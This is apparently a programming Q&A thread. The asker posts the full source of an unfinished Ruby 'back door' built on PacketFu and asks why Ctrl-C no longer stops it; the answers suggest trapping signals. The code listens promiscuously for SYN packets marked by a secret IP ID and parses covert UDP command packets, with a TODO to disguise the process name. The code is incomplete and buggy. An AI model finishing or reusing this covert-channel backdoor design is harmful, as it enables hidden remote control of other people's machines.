# Ctrl-c no longer kills my program

Tags: ruby, raw-sockets

I'm writing a ruby back door program that uses PacketFu to listen for packets.

The application works properly, but for some reason it will not exit on interrupt (ctrl+c)

This is the section of code which seems immune to interrupts. It does not matter if I completely empty out the each loop, it will always stall ignore interrupts.

Any ideas?

Edit: I can make the interrupt catch properly when the packet.stream.each loop is executed (Forcing some TCP traffic). It seems that whatever PacketFu does while waiting for new packets is making it immune to interrupts. I guess I will ignore it for now, if anyone knows what PacketFu code might cause this, I'd love to know!

PS. I've Included the entire server code below in case anyone wants test for themselves.

Code Snippet: (See below for entire File)

```
begin 
# Start listening for connection packets via TCP
print "starting up\n"
capturedTCP = PacketFu::Capture.new(:iface => $config[:iface], :start => true, :promisc => true, :filter => "tcp")
print "about to capture\n"
capturedTCP.stream.each { |packet|
    puts "Got one!"
    pkt = Packet.parse packet
    # Check that it is a TCP packet?
    if pkt.is_tcp?
        # Is it one of our SYN packets?
        if pkt.tcp_flags.syn == 1 && pkt.ip_id == $identKey
            # TODO: Respond with SYN/ACK
            flags = [1,0,0,0,1,0]
            payload = ""
            tcpResp = tcpConstruct($identKey,srcIP,80,dstIP,Random.rand(65535),flags, payload)
            tcpResp.to_w # Sent
            # TODO: Use thread instead.
            dataListener($identKey,dstIP,dstPort)

        end
    end
}
rescue Interrupt => e
puts "Interrupted by user"
exit 0
end
```

Entire File:

```
require 'rubygems'
require 'packetfu'
require 'thread'

include PacketFu

#TODO: Move these functions to a diff file
# Utility function for loading latest config
def loadConfig(filePath)
#TODO: Load up file and get config
#For now just hard coded.
$iName = "eth0"
identKey = 12345
listenPortMain = "80" # Port to listen for connection requests
processName = "xyz" # Change process name to hide.
filterTCP = "tcp and port #{listenPortMain}"
userCmdField = "src-port" # Options: src-port, dst-port
userCmdRun = "20"
end

# Function for handling client session 
def clientListen(ip,port)
# Start listening for connection packets via UDP
capturedUDP = PacketFu::Capture.new(:iface => config[:iface], :start => true, :promisc => true, :filter => "udp and port #{port} and src host #{ip}")

capturedUDP.stream.each { |packet|
    pkt = Packet.parse packet
    # Check that it is a UDP packet
    if pkt.is_udp?
        # Is it one of our UDP packets?
        if pkt.ip_id == identKey
            # Get the data
            data = pkt.payload()
            # Look for the command type
            if userCmdField == "src-port"
                cmdFieldVal = pkt.udp_src
            end
            if userCmdField == "dst-port"
                cmdFieldVal = pkt.udp_dst
            end
            # Command processing
            if userCmdField == userCmdRun
                cmdDataChrs = [];
                # Check for sequence number
                seqCurrent = pkt.payload[0].unpack("H*")[0].to_i
                seqTotal   = pkt.payload[1].unpack("H*")[0].to_i
                dataLen    = (pkt.payload[2].unpack("H*").chr + pkt.payload[2].unpack("H*").chr).to_i
                while pos <= dataLen do
                    cmdDataChrs.push(pkt.payload[pos])
                    pos = pos + 1
                end
                cmdData = cmdDataChrs.unpack("H*")
                print "Got command: #{cmdData}"
            end
        end
    end
}
end

#Construct TCP Packet
def tcpConstruct(identKey,srcIP,srcPort,dstIP,dstPort,flags, payload)
#--> Build TCP/IP

#- Build Ethernet header:---------------------------------------
pkt = PacketFu::TCPPacket.new(:config => $config , :flavor => "Linux")
# pkt.eth_src = "00:11:22:33:44:55" # Ether header: Source MAC ; you can use: pkt.eth_header.eth_src
# pkt.eth_dst = "FF:FF:FF:FF:FF:FF" # Ether header: Destination MAC ; you can use: pkt.eth_header.eth_dst
pkt.eth_proto   # Ether header: Protocol ; you can use: pkt.eth_header.eth_proto
#- Build IP header:---------------------------------------
pkt.ip_v = 4    # IP header: IPv4 ; you can use: pkt.ip_header.ip_v
pkt.ip_hl = 5   # IP header: IP header length ; you can use: pkt.ip_header.ip_hl
pkt.ip_tos  = 0 # IP header: Type of service ; you can use: pkt.ip_header.ip_tos
pkt.ip_len  = 20    # IP header: Total Length ; you can use: pkt.ip_header.ip_len
pkt.ip_id = identKey    # IP header: Identification ; you can use: pkt.ip_header.ip_id
pkt.ip_frag = 0 # IP header: Don't Fragment ; you can use: pkt.ip_header.ip_frag
pkt.ip_ttl = 115    # IP header: TTL(64) is the default ; you can use: pkt.ip_header.ip_ttl
pkt.ip_proto = 6    # IP header: Protocol = tcp (6) ; you can use: pkt.ip_header.ip_proto
pkt.ip_sum  # IP header: Header Checksum ; you can use: pkt.ip_header.ip_sum
pkt.ip_saddr = srcIP    # IP header: Source IP. use $config[:ip_saddr] if you want your real IP ; you can use: pkt.ip_header.ip_saddr
pkt.ip_daddr = dstIP    # IP header: Destination IP ; you can use: pkt.ip_header.ip_daddr
#- TCP header:---------------------------------------
pkt.payload = payload   # TCP header: packet header(body)
pkt.tcp_flags.ack = flags[0]    # TCP header: Acknowledgment
pkt.tcp_flags.fin = flags[1]    # TCP header: Finish
pkt.tcp_flags.psh = flags[2]    # TCP header: Push
pkt.tcp_flags.rst = flags[3]    # TCP header: Reset
pkt.tcp_flags.syn = flags[4]    # TCP header: Synchronize sequence numbers
pkt.tcp_flags.urg = flags[5]    # TCP header: Urgent pointer
pkt.tcp_ecn = 0 # TCP header: ECHO
pkt.tcp_win = 8192  # TCP header: Window
pkt.tcp_hlen = 5    # TCP header: header length
pkt.tcp_src = srcPort   # TCP header: Source Port (random is the default )
pkt.tcp_dst = dstPort   # TCP header: Destination Port (make it random/range for general scanning)
pkt.recalc  # Recalculate/re-build whole pkt (should be at the end)
return pkt
end

def dataListener(identKey,dstIP,dstPort)
# Listen for UDP data packets
print "Listening for Data from #{dstIP}\n"
capturedUDP = PacketFu::Capture.new(:iface => $config[:iface], :start => true, :promisc => true, :filter => "udp and port #{dstPort}")

capturedTCP.stream.each { |packet|
    pkt = Packet.parse packet
    if pkt.ip_id == identKey
        # Get Packet Type
        if userCmdField == "src-port"
            dataType = pkt.udp_src
        elsif userCmdField == "dst-port"
            dataType = pkt.udp_dst
        end

        if dataType == userCmdRun
            cmdLen = pkt.payload[0].unpack("c*")
            cmd = ""
            while i <= cmdLen do
                cmd += pkt.payload[i].unpack("h*")
            end
            print "Command: #{cmd}\n"
        end
    end
}
end
# - - - - Begin Main

# Get config from file
loadConfig("/path/to/file.txt")

#$config = PacketFu::Config.new(PacketFu::Utils.whoami?(:iface=> iName)).config # set interface
$config = PacketFu::Config.new(:iface=> $iName).config # use this line instead of above if you face `whoami?': uninitialized constant PacketFu::Capture (NameError)

#TODO: Mask process name from config

# Create sessions array (Holds threads)
sessions = []
Signal.trap('INT') { exit 0 }
begin 
# Start listening for connection packets via TCP
print "starting up\n"
capturedTCP = PacketFu::Capture.new(:iface => $config[:iface], :start => true, :promisc => true, :filter => "tcp")
print "about to capture\n"
capturedTCP.stream.each { |packet|
    puts "Got one!"
    pkt = Packet.parse packet
    # Check that it is a TCP packet?
    if pkt.is_tcp?
        # Is it one of our SYN packets?
        if pkt.tcp_flags.syn == 1 && pkt.ip_id == $identKey
            # TODO: Respond with SYN/ACK
            flags = [1,0,0,0,1,0]
            payload = ""
            tcpResp = tcpConstruct($identKey,srcIP,80,dstIP,Random.rand(65535),flags, payload)
            tcpResp.to_w # Sent
            # TODO: Use thread instead.
            dataListener($identKey,dstIP,dstPort)
        end
    end
}

end
```

Answer (score 0, accepted):

If your program runs on some flavor of Unix, you could catch the INT signal(sent by Ctrl-C) and call `exit` explicitly.

Put this before or after your `begin` block:

```
Signal.trap('INT') { exit 0 }
```

Additionally you could do some cleanup before exiting your program:

```
Signal.trap('INT') do
  # some cleanup here
  puts "Interrupted by user"
  exit 0
end
```

[More on signals in Ruby](http://www.ruby-doc.org/core-1.9.3/Signal.html)

[Unix signals list](http://en.wikipedia.org/wiki/Unix_signal)

Comment: Thanks for the help, but there is no change when I add the trap before or after my begin block.
I can press Ctrl-c all I want and the characters just appear in the terminal. If I enter Ctrl-z it will THEN register the interrupt but only put it to sleep (I still have to kill it via PID).

Comment: try `Signal.trap('INT') { puts "Force Exiting..."; ::Process.exit! }` and let me know whether you are seeing "Force Exiting" in output

Comment: seems INT signal are caught somewhere upper in your program or in some required gem. try then to kill it by `Ctrl-Z`? `Signal.trap('TSTP') { puts "Force Exiting..."; ::Process.exit! }`

Comment: also try this: `Signal.trap('TERM') { puts "Force Exiting..."; ::Process.exit! }`

Comment: I agree that the INT signals must be getting caught somewhere, but I can't see where. I've posted the entire program above, it has to be my own code doing it somewhere..

Comment: Do you have the same behaviour when you send SIGUSR1,and exit from there? Also,could you mention the process state in 'top' output when this happens?

Comment: Checking 'top' shows that this program is eating up 97% CPU, both before and after sending the interrupt..

Comment: I'm marking this answer as correct, because it should work as long as you don't have any included libraries with hidden interrupt captures. My problem must be specific to the packetfu library.